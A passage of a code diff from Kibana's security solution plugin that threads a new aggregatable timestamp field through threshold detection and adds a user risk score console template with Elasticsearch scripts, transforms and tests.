'@kbn/rule-data-utils'; import { ruleExecutionLogMock } from '../../rule_monitoring/mocks'; +import { buildTimestampRuntimeMapping } from '../../rule_types/utils'; +import { TIMESTAMP_RUNTIME_FIELD } from '../../rule_types/constants'; const queryFilter = getQueryFilter('', 'kuery', [], ['*'], []); const mockSingleSearchAfter = jest.fn(async () => ({ @@ -54,6 +56,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -89,6 +92,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -150,6 +154,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -223,6 +228,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -309,6 +315,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -332,4 +339,62 @@ describe('findThresholdSignals', () => { }) ); }); + + it('should generate a threshold signal query with timestamp override', async () => { + const timestampOverride = 'event.ingested'; + const { aggregatableTimestampField, timestampRuntimeMappings } = { + aggregatableTimestampField: TIMESTAMP_RUNTIME_FIELD, + timestampRuntimeMappings: buildTimestampRuntimeMapping({ + timestampOverride, + }), + }; + + await findThresholdSignals({ + from: 'now-6m', + to: 'now', + maxSignals: 100, + inputIndexPattern: ['*'], + services: mockService, + ruleExecutionLogger, + filter: queryFilter, + threshold: { + cardinality: [ + { + field: 'source.ip', + value: 5, + }, + ], + field: [], + value: 200, + }, + runtimeMappings: timestampRuntimeMappings, + primaryTimestamp: timestampOverride, + secondaryTimestamp: TIMESTAMP, + aggregatableTimestampField, + }); + expect(mockSingleSearchAfter).toHaveBeenCalledWith( + expect.objectContaining({ + primaryTimestamp: timestampOverride, + secondaryTimestamp: TIMESTAMP, + runtimeMappings: buildTimestampRuntimeMapping({ timestampOverride }), + aggregations: { + cardinality_count: { + cardinality: { + field: 'source.ip', + }, + }, + max_timestamp: { + max: { + field: TIMESTAMP_RUNTIME_FIELD, + }, + }, + min_timestamp: { + min: { + field: TIMESTAMP_RUNTIME_FIELD, + }, + }, + }, + }) + ); + }); }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts index 21e66bbd069eb..63e293401a77a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts @@ -44,6 +44,7 @@ interface FindThresholdSignalsParams { runtimeMappings: estypes.MappingRuntimeFields | undefined; primaryTimestamp: TimestampOverride; secondaryTimestamp: TimestampOverrideOrUndefined; + aggregatableTimestampField: string; } const hasThresholdFields = (threshold: ThresholdNormalized) => !!threshold.field.length; @@ -65,6 +66,7 @@ export const findThresholdSignals = async ({ runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }: FindThresholdSignalsParams): Promise<{ buckets: ThresholdBucket[]; searchDurations: string[]; @@ -85,7 +87,7 @@ export const findThresholdSignals = async ({ const { searchResult, searchDuration, searchErrors } = await singleSearchAfter({ aggregations: buildThresholdMultiBucketAggregation({ threshold, - timestampField: primaryTimestamp, + aggregatableTimestampField, sortKeys, }), index: inputIndexPattern, @@ -121,7 +123,7 @@ export const findThresholdSignals = async ({ const { searchResult, searchDuration, searchErrors } = await singleSearchAfter({ aggregations: buildThresholdSingleBucketAggregation({ threshold, - timestampField: primaryTimestamp, + aggregatableTimestampField, }), searchAfterSortIds: undefined, index: inputIndexPattern, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts index 8ae102ee75b99..b38351751a717 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts @@ -13,7 +13,7 @@ describe('getThresholdBucketFilters', () => { it('should generate filters for threshold signal detection with dupe mitigation', async () => { const result = await getThresholdBucketFilters({ signalHistory: sampleThresholdSignalHistory(), - primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(result).toEqual([ { diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts index 786cda9d0a62c..a5ab1c4dc5cea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts @@ -15,10 +15,10 @@ import type { ThresholdSignalHistory, ThresholdSignalHistoryRecord } from '../ty */ export const getThresholdBucketFilters = async ({ signalHistory, - primaryTimestamp, + aggregatableTimestampField, }: { signalHistory: ThresholdSignalHistory; - primaryTimestamp: string; + aggregatableTimestampField: string; }): Promise => { const filters = Object.values(signalHistory).reduce( (acc: ESFilter[], bucket: ThresholdSignalHistoryRecord): ESFilter[] => { @@ -27,7 +27,7 @@ export const getThresholdBucketFilters = async ({ filter: [ { range: { - [primaryTimestamp]: { + [aggregatableTimestampField]: { // Timestamp of last event signaled on for this set of terms. lte: new Date(bucket.lastSignalTimestamp).toISOString(), }, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts index 9d352da66935d..97147efc48df0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts @@ -594,7 +594,7 @@ export const getValidDateFromDoc = ({ if (tempMoment.isValid()) { return tempMoment.toDate(); } else if (typeof timestampValue === 'string') { - // worse case we have a string from fields API or other areas of Elasticsearch that have given us a number as a string, + // worst case we have a string from fields API or other areas of Elasticsearch that have given us a number as a string, // so we try one last time to parse this best we can by converting from string to a number const maybeDate = moment(+lastTimestamp); if (maybeDate.isValid()) { diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts index 687e4b5b65e4e..e4b786aa4822a 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts @@ -7,4 +7,5 @@ export const consoleMappings = { enable_host_risk_score: 'enable_host_risk_score.console', + enable_user_risk_score: 'enable_user_risk_score.console', }; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console new file mode 100644 index 0000000000000..33e27178f0fb2 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console @@ -0,0 +1,244 @@ +# Click the run button of each step to enable the module +# Upload scripts +# 1. Script to assign risk level based on risk score +PUT _scripts/ml_userriskscore_levels_script +{ + "script": { + "lang": "painless", + "source": "double risk_score = (def)ctx.getByPath(params.risk_score);\nif (risk_score < 20) {\n ctx['risk'] = 'Unknown'\n}\nelse if (risk_score >= 20 && risk_score < 40) {\n ctx['risk'] = 'Low'\n}\nelse if (risk_score >= 40 && risk_score < 70) {\n ctx['risk'] = 'Moderate'\n}\nelse if (risk_score >= 70 && risk_score < 90) {\n ctx['risk'] = 'High'\n}\nelse if (risk_score >= 90) {\n ctx['risk'] = 'Critical'\n}" + } +} + +# 2. Map script for the User Risk Score transform +PUT _scripts/ml_userriskscore_map_script +{ + "script": { + "lang": "painless", "source": "// Get running sum of risk score per rule name per shard\\\\\nString rule_name = doc[\"signal.rule.name\"].value;\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, 0.0);\nstats = doc[\"signal.rule.risk_score\"].value;\nstate.rule_risk_stats.put(rule_name, stats);" + } +} + +# 3. Reduce script for the User Risk Score transform +PUT _scripts/ml_userriskscore_reduce_script +{ + "script": { + "lang": "painless", + "source": "// Consolidating time decayed risks from across all shards\nMap total_risk_stats = new HashMap();\nfor (state in states) {\n for (key in state.rule_risk_stats.keySet()) {\n def rule_stats = state.rule_risk_stats.get(key);\n def stats = total_risk_stats.getOrDefault(key, 0.0);\n stats = rule_stats;\n total_risk_stats.put(key, stats);\n }\n}\n// Consolidating individual rule risks and arranging them in decreasing order\nList risks = new ArrayList();\nfor (key in total_risk_stats.keySet()) {\n risks.add(total_risk_stats[key])\n}\nCollections.sort(risks, Collections.reverseOrder());\n// Calculating total risk and normalizing it to a range\ndouble total_risk = 0.0;\ndouble risk_cap = params.max_risk * params.zeta_constant;\nfor (int i=0;i= 40 && total_norm_risk < 50) {\n total_norm_risk = 85 + (total_norm_risk - 40);\n}\nelse {\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\n}\n\nList rule_stats = new ArrayList();\nfor (key in total_risk_stats.keySet()) {\n Map temp = new HashMap();\n temp[\"rule_name\"] = key;\n temp[\"rule_risk\"] = total_risk_stats[key];\n rule_stats.add(temp);\n}\n\nreturn [\"risk_score\": total_norm_risk, \"rule_risks\": rule_stats];" + } +} + +# 4. Upload ingest pipeline +# Ingest pipeline to add ingest timestamp and risk level to documents +PUT _ingest/pipeline/ml_userriskscore_ingest_pipeline +{ + "processors": [ + { + "set": { + "field": "ingest_timestamp", + "value": "{{_ingest.timestamp}}" + } + }, + { + "fingerprint": { + "fields": [ + "@timestamp", + "_id" + ], + "method": "SHA-256", + "target_field": "_id" + } + }, + { + "script": { + "id": "ml_userriskscore_levels_script", + "params": { + "risk_score": "risk_stats.risk_score" + } + } + } + ] +} + +# 5. Create mappings for the destination index of the User Risk Score pivot transform +PUT ml_user_risk_score_{{space_name}} +{ + "mappings":{ + "properties":{ + "user.name":{ + "type":"keyword" + }, + "@timestamp": { + "type": "date" + }, + "ingest_timestamp": { + "type": "date" + }, + "risk": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "risk_stats": { + "properties": { + "risk_score": { + "type": "float" + } + } + } + } + } +} + +# 6. Upload the User Risk Score pivot transform +# This transform runs hourly and calculates a risk score and risk level for users in a Kibana space +PUT _transform/ml_userriskscore_pivot_transform_{{space_name}} +{ + "dest": { + "index": "ml_user_risk_score_{{space_name}}", + "pipeline": "ml_userriskscore_ingest_pipeline" + }, + "frequency": "1h", + "pivot": { + "aggregations": { + "@timestamp": { + "max": { + "field": "@timestamp" + } + }, + "risk_stats": { + "scripted_metric": { + "combine_script": "return state", + "init_script": "state.rule_risk_stats = new HashMap();", + "map_script": { + "id": "ml_userriskscore_map_script" + }, + "params": { + "max_risk": 100, + "p": 1.5, + "zeta_constant": 2.612 + }, + "reduce_script": { + "id": "ml_userriskscore_reduce_script" + } + } + } + }, + "group_by": { + "user.name": { + "terms": { + "field": "user.name" + } + } + } + }, + "source": { + "index": [ + ".alerts-security.alerts-{{space_name}}" + ], + "query": { + "bool": { + "filter": [ + { + "range": { + "@timestamp": { + "gte": "now-90d" + } + } + }, + { + "match": { + "signal.status": "open" + } + } + ] + } + } + }, + "sync": { + "time": { + "delay": "120s", + "field": "@timestamp" + } + } +} + +# 7. start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_start + +# 8. Create mappings for the destination index of the User Risk Score latest transform +PUT ml_user_risk_score_latest_{{space_name}} +{ + "mappings":{ + "properties":{ + "user.name":{ + "type":"keyword" + }, + "@timestamp": { + "type": "date" + }, + "ingest_timestamp": { + "type": "date" + }, + "risk": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "risk_stats": { + "properties": { + "risk_score": { + "type": "float" + } + } + } + } + } +} + +# 9. Upload the latest transform +# This transform gets the latest risk information about users in a Kibana space +PUT _transform/ml_userriskscore_latest_transform_{{space_name}} +{ + "dest": { + "index": "ml_user_risk_score_latest_{{space_name}}" + }, + "frequency": "1h", + "latest": { + "sort": "@timestamp", + "unique_key": [ + "user.name" + ] + }, + "source": { + "index": [ + "ml_user_risk_score_{{space_name}}" + ] + }, + "sync": { + "time": { + "delay": "2s", + "field": "ingest_timestamp" + } + } +} + +# 10. Start the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_start + +# Hint: If you don't see data after running any of the transforms, stop and restart the transforms +# Stop the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_stop + +# Start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_start + +# Stop the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_stop + +# Start the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_start diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap index 1cb33ff1b15e4..9a81a32f80eed 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap @@ -1,47 +1,37 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP -exports[`readPrebuiltDevToolContentRoute should read content from enable_host_risk_score template 1`] = ` +exports[`readPrebuiltDevToolContentRoute should read content from "enable_host_risk_score" template 1`] = ` "# Click the run button of each step to enable the module # Upload scripts # 1. Script to assign risk level based on risk score -PUT _scripts/ml_hostriskscore_levels_script +PUT _scripts/ml_userriskscore_levels_script { \\"script\\": { \\"lang\\": \\"painless\\", - \\"source\\": \\"double risk_score = (def)ctx.getByPath(params.risk_score);\\\\nif (risk_score < 20) {\\\\n ctx['risk'] = 'Unknown'\\\\n}\\\\nelse if (risk_score >= 20 && risk_score < 40) {\\\\n ctx['risk'] = 'Low'\\\\n}\\\\nelse if (risk_score >= 40 && risk_score < 70) {\\\\n ctx['risk'] = 'Moderate'\\\\n}\\\\nelse if (risk_score >= 70 && risk_score < 90) {\\\\n ctx['risk'] = 'High'\\\\n}\\\\nelse if (risk_score >= 90) {\\\\n ctx['risk'] = 'Critical'\\\\n}\\" + \\"source\\": \\"double risk_score = (def)ctx.getByPath(params.risk_score);\\\\nif (risk_score < 20) {\\\\n ctx['risk'] = 'Unknown'\\\\n}\\\\nelse if (risk_score >= 20 && risk_score < 40) {\\\\n ctx['risk'] = 'Low'\\\\n}\\\\nelse if (risk_score >= 40 && risk_score < 70) {\\\\n ctx['risk'] = 'Moderate'\\\\n}\\\\nelse if (risk_score >= 70 && risk_score < 90) {\\\\n ctx['risk'] = 'High'\\\\n}\\\\nelse if (risk_score >= 90) {\\\\n ctx['risk'] = 'Critical'\\\\n}\\" } } -# 2. Map script for the Host Risk Score transform -PUT _scripts/ml_hostriskscore_map_script +# 2. Map script for the User Risk Score transform +PUT _scripts/ml_userriskscore_map_script { \\"script\\": { - \\"lang\\": \\"painless\\", - \\"source\\": \\"// Get the host variant\\\\nif (state.host_variant_set == false) {\\\\n if (doc.containsKey(\\\\\\"host.os.full\\\\\\") && doc[\\\\\\"host.os.full\\\\\\"].size() != 0) {\\\\n state.host_variant = doc[\\\\\\"host.os.full\\\\\\"].value;\\\\n state.host_variant_set = true;\\\\n }\\\\n}\\\\n// Aggregate all the tactics seen on the host\\\\nif (doc.containsKey(\\\\\\"signal.rule.threat.tactic.id\\\\\\") && doc[\\\\\\"signal.rule.threat.tactic.id\\\\\\"].size() != 0) {\\\\n state.tactic_ids.add(doc[\\\\\\"signal.rule.threat.tactic.id\\\\\\"].value);\\\\n}\\\\n// Get running sum of time-decayed risk score per rule name per shard\\\\nString rule_name = doc[\\\\\\"signal.rule.name\\\\\\"].value;\\\\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, [0.0,\\\\\\"\\\\\\",false]);\\\\nint time_diff = (int)((System.currentTimeMillis() - doc[\\\\\\"@timestamp\\\\\\"].value.toInstant().toEpochMilli()) / (1000.0 * 60.0 * 60.0));\\\\ndouble risk_derate = Math.min(1, Math.exp((params.lookback_time - time_diff) / params.time_decay_constant));\\\\nstats[0] = Math.max(stats[0], doc[\\\\\\"signal.rule.risk_score\\\\\\"].value * risk_derate);\\\\nif (stats[2] == false) {\\\\n stats[1] = doc[\\\\\\"kibana.alert.rule.uuid\\\\\\"].value;\\\\n stats[2] = true;\\\\n}\\\\nstate.rule_risk_stats.put(rule_name, stats);\\" - } -} - -# 3. Reduce script for the Host Risk Score transform -PUT _scripts/ml_hostriskscore_reduce_script -{ - \\"script\\": { - \\"lang\\": \\"painless\\", - \\"source\\": \\"// Consolidating time decayed risks and tactics from across all shards\\\\nMap total_risk_stats = new HashMap();\\\\nString host_variant = new String();\\\\ndef tactic_ids = new HashSet();\\\\nfor (state in states) {\\\\n for (key in state.rule_risk_stats.keySet()) {\\\\n def rule_stats = state.rule_risk_stats.get(key);\\\\n def stats = total_risk_stats.getOrDefault(key, [0.0,\\\\\\"\\\\\\",false]);\\\\n stats[0] = Math.max(stats[0], rule_stats[0]);\\\\n if (stats[2] == false) {\\\\n stats[1] = rule_stats[1];\\\\n stats[2] = true;\\\\n } \\\\n total_risk_stats.put(key, stats);\\\\n }\\\\n if (host_variant.length() == 0) {\\\\n host_variant = state.host_variant;\\\\n }\\\\n tactic_ids.addAll(state.tactic_ids);\\\\n}\\\\n// Consolidating individual rule risks and arranging them in decreasing order\\\\nList risks = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n risks.add(total_risk_stats[key][0])\\\\n}\\\\nCollections.sort(risks, Collections.reverseOrder());\\\\n// Calculating total host risk score\\\\ndouble total_risk = 0.0;\\\\ndouble risk_cap = params.max_risk * params.zeta_constant;\\\\nfor (int i=0;i= 40 && total_norm_risk < 50) {\\\\n total_norm_risk = 85 + (total_norm_risk - 40);\\\\n}\\\\nelse {\\\\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\\\\n}\\\\n// Calculating multipliers to the host risk score\\\\ndouble risk_multiplier = 1.0;\\\\nList multipliers = new ArrayList();\\\\n// Add a multiplier if host is a server\\\\nif (host_variant.toLowerCase().contains(\\\\\\"server\\\\\\")) {\\\\n risk_multiplier *= params.server_multiplier;\\\\n multipliers.add(\\\\\\"Host is a server\\\\\\");\\\\n}\\\\n// Add multipliers based on number and diversity of tactics seen on the host\\\\nfor (String tactic : tactic_ids) {\\\\n multipliers.add(\\\\\\"Tactic \\\\\\"+tactic);\\\\n risk_multiplier *= 1 + params.tactic_base_multiplier * params.tactic_weights.getOrDefault(tactic, 0);\\\\n}\\\\n// Calculating final risk\\\\ndouble final_risk = total_norm_risk;\\\\nif (risk_multiplier > 1.0) {\\\\n double prior_odds = (total_norm_risk) / (100 - total_norm_risk);\\\\n double updated_odds = prior_odds * risk_multiplier; \\\\n final_risk = 100 * updated_odds / (1 + updated_odds);\\\\n}\\\\n// Adding additional metadata\\\\nList rule_stats = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n Map temp = new HashMap();\\\\n temp[\\\\\\"rule_name\\\\\\"] = key;\\\\n temp[\\\\\\"rule_risk\\\\\\"] = total_risk_stats[key][0];\\\\n temp[\\\\\\"rule_id\\\\\\"] = total_risk_stats[key][1];\\\\n rule_stats.add(temp);\\\\n}\\\\n\\\\nreturn [\\\\\\"risk_score\\\\\\": final_risk, \\\\\\"rule_risks\\\\\\": rule_stats, \\\\\\"risk_multipliers\\\\\\": multipliers];\\" + \\"lang\\": \\"painless\\", \\"source\\": \\"// Get running sum of risk score per rule name per shard\\\\\\\\\\\\\\\\\\\\nString rule_name = doc[\\\\\\"signal.rule.name\\\\\\"].value;\\\\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, 0.0);\\\\nstats = doc[\\\\\\"signal.rule.risk_score\\\\\\"].value;\\\\nstate.rule_risk_stats.put(rule_name, stats);\\" } } -# 4. Script to setup initial state for the Host Risk Score scripted metric aggregation -PUT _scripts/ml_hostriskscore_init_script +# 3. Reduce script for the User Risk Score transform +PUT _scripts/ml_userriskscore_reduce_script { \\"script\\": { \\"lang\\": \\"painless\\", - \\"source\\": \\"state.rule_risk_stats = new HashMap();\\\\nstate.host_variant_set = false;\\\\nstate.host_variant = new String();\\\\nstate.tactic_ids = new HashSet();\\" + \\"source\\": \\"// Consolidating time decayed risks from across all shards\\\\nMap total_risk_stats = new HashMap();\\\\nfor (state in states) {\\\\n for (key in state.rule_risk_stats.keySet()) {\\\\n def rule_stats = state.rule_risk_stats.get(key);\\\\n def stats = total_risk_stats.getOrDefault(key, 0.0);\\\\n stats = rule_stats;\\\\n total_risk_stats.put(key, stats);\\\\n }\\\\n}\\\\n// Consolidating individual rule risks and arranging them in decreasing order\\\\nList risks = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n risks.add(total_risk_stats[key])\\\\n}\\\\nCollections.sort(risks, Collections.reverseOrder());\\\\n// Calculating total risk and normalizing it to a range\\\\ndouble total_risk = 0.0;\\\\ndouble risk_cap = params.max_risk * params.zeta_constant;\\\\nfor (int i=0;i= 40 && total_norm_risk < 50) {\\\\n total_norm_risk = 85 + (total_norm_risk - 40);\\\\n}\\\\nelse {\\\\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\\\\n}\\\\n\\\\nList rule_stats = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n Map temp = new HashMap();\\\\n temp[\\\\\\"rule_name\\\\\\"] = key;\\\\n temp[\\\\\\"rule_risk\\\\\\"] = total_risk_stats[key];\\\\n rule_stats.add(temp);\\\\n}\\\\n\\\\nreturn [\\\\\\"risk_score\\\\\\": total_norm_risk, \\\\\\"rule_risks\\\\\\": rule_stats];\\" } } -# 5. Upload the ingest pipeline +# 4. Upload ingest pipeline # Ingest pipeline to add ingest timestamp and risk level to documents -PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline +PUT _ingest/pipeline/ml_userriskscore_ingest_pipeline { \\"processors\\": [ { @@ -62,7 +52,7 @@ PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline }, { \\"script\\": { - \\"id\\": \\"ml_hostriskscore_levels_script\\", + \\"id\\": \\"ml_userriskscore_levels_script\\", \\"params\\": { \\"risk_score\\": \\"risk_stats.risk_score\\" } @@ -71,12 +61,12 @@ PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline ] } -# 6. Create mappings for the destination index of the Host Risk Score pivot transform -PUT ml_host_risk_score_default +# 5. Create mappings for the destination index of the User Risk Score pivot transform +PUT ml_user_risk_score_default { \\"mappings\\":{ \\"properties\\":{ - \\"host.name\\":{ + \\"user.name\\":{ \\"type\\":\\"keyword\\" }, \\"@timestamp\\": { @@ -104,13 +94,13 @@ PUT ml_host_risk_score_default } } -# 7. Upload the Host Risk Score pivot transform -# This transform runs hourly and calculates a risk score and risk level for hosts in a Kibana space -PUT _transform/ml_hostriskscore_pivot_transform_default +# 6. Upload the User Risk Score pivot transform +# This transform runs hourly and calculates a risk score and risk level for users in a Kibana space +PUT _transform/ml_userriskscore_pivot_transform_default { \\"dest\\": { - \\"index\\": \\"ml_host_risk_score_default\\", - \\"pipeline\\": \\"ml_hostriskscore_ingest_pipeline\\" + \\"index\\": \\"ml_user_risk_score_default\\", + \\"pipeline\\": \\"ml_userriskscore_ingest_pipeline\\" }, \\"frequency\\": \\"1h\\", \\"pivot\\": { @@ -123,47 +113,25 @@ PUT _transform/ml_hostriskscore_pivot_transform_default \\"risk_stats\\": { \\"scripted_metric\\": { \\"combine_script\\": \\"return state\\", - \\"init_script\\": { - \\"id\\": \\"ml_hostriskscore_init_script\\" - }, + \\"init_script\\": \\"state.rule_risk_stats = new HashMap();\\", \\"map_script\\": { - \\"id\\": \\"ml_hostriskscore_map_script\\" + \\"id\\": \\"ml_userriskscore_map_script\\" }, \\"params\\": { - \\"lookback_time\\": 72, \\"max_risk\\": 100, \\"p\\": 1.5, - \\"server_multiplier\\": 1.5, - \\"tactic_base_multiplier\\": 0.25, - \\"tactic_weights\\": { - \\"TA0001\\": 1, - \\"TA0002\\": 2, - \\"TA0003\\": 3, - \\"TA0004\\": 4, - \\"TA0005\\": 4, - \\"TA0006\\": 4, - \\"TA0007\\": 4, - \\"TA0008\\": 5, - \\"TA0009\\": 6, - \\"TA0010\\": 7, - \\"TA0011\\": 6, - \\"TA0040\\": 8, - \\"TA0042\\": 1, - \\"TA0043\\": 1 - }, - \\"time_decay_constant\\": 6, \\"zeta_constant\\": 2.612 }, \\"reduce_script\\": { - \\"id\\": \\"ml_hostriskscore_reduce_script\\" + \\"id\\": \\"ml_userriskscore_reduce_script\\" } } } }, \\"group_by\\": { - \\"host.name\\": { + \\"user.name\\": { \\"terms\\": { - \\"field\\": \\"host.name\\" + \\"field\\": \\"user.name\\" } } } @@ -178,9 +146,14 @@ PUT _transform/ml_hostriskscore_pivot_transform_default { \\"range\\": { \\"@timestamp\\": { - \\"gte\\": \\"now-5d\\" + \\"gte\\": \\"now-90d\\" } } + }, + { + \\"match\\": { + \\"signal.status\\": \\"open\\" + } } ] } @@ -194,16 +167,15 @@ PUT _transform/ml_hostriskscore_pivot_transform_default } } +# 7. start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_default/_start -# 8. Start the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_start - -# 9. Create mappings for the destination index of the Host Risk Score latest transform -PUT ml_host_risk_score_latest_default +# 8. Create mappings for the destination index of the User Risk Score latest transform +PUT ml_user_risk_score_latest_default { \\"mappings\\":{ \\"properties\\":{ - \\"host.name\\":{ + \\"user.name\\":{ \\"type\\":\\"keyword\\" }, \\"@timestamp\\": { @@ -231,23 +203,23 @@ PUT ml_host_risk_score_latest_default } } -# 10. Upload the latest transform -# This transform gets the latest risk information about hosts in a Kibana space -PUT _transform/ml_hostriskscore_latest_transform_default +# 9. Upload the latest transform +# This transform gets the latest risk information about users in a Kibana space +PUT _transform/ml_userriskscore_latest_transform_default { \\"dest\\": { - \\"index\\": \\"ml_host_risk_score_latest_default\\" + \\"index\\": \\"ml_user_risk_score_latest_default\\" }, \\"frequency\\": \\"1h\\", \\"latest\\": { \\"sort\\": \\"@timestamp\\", \\"unique_key\\": [ - \\"host.name\\" + \\"user.name\\" ] }, \\"source\\": { \\"index\\": [ - \\"ml_host_risk_score_default\\" + \\"ml_user_risk_score_default\\" ] }, \\"sync\\": { @@ -258,20 +230,20 @@ PUT _transform/ml_hostriskscore_latest_transform_default } } -# 11. Start the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_start +# 10. Start the latest transform +POST _transform/ml_userriskscore_latest_transform_default/_start # Hint: If you don't see data after running any of the transforms, stop and restart the transforms # Stop the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_stop +POST _transform/ml_userriskscore_pivot_transform_default/_stop # Start the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_start +POST _transform/ml_userriskscore_pivot_transform_default/_start # Stop the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_stop +POST _transform/ml_userriskscore_latest_transform_default/_stop # Start the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_start +POST _transform/ml_userriskscore_latest_transform_default/_start " `; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts index cef23b1b1d5f6..1a3f5455f18ff 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts @@ -34,13 +34,16 @@ describe('readPrebuiltDevToolContentRoute', () => { readPrebuiltDevToolContentRoute(server.router); }); - test('should read content from enable_host_risk_score template', async () => { - const response = await server.inject( - readPrebuiltDevToolContentRequest('enable_host_risk_score'), - requestContextMock.convertContext(context) - ); - - expect(response.status).toEqual(200); - expect(response.body).toMatchSnapshot(); - }); + it.each([['enable_host_risk_score', 'enable_user_risk_score']])( + 'should read content from %p template', + async () => { + const response = await server.inject( + readPrebuiltDevToolContentRequest('enable_user_risk_score'), + requestContextMock.convertContext(context) + ); + + expect(response.status).toEqual(200); + expect(response.body).toMatchSnapshot(); + } + ); }); diff --git 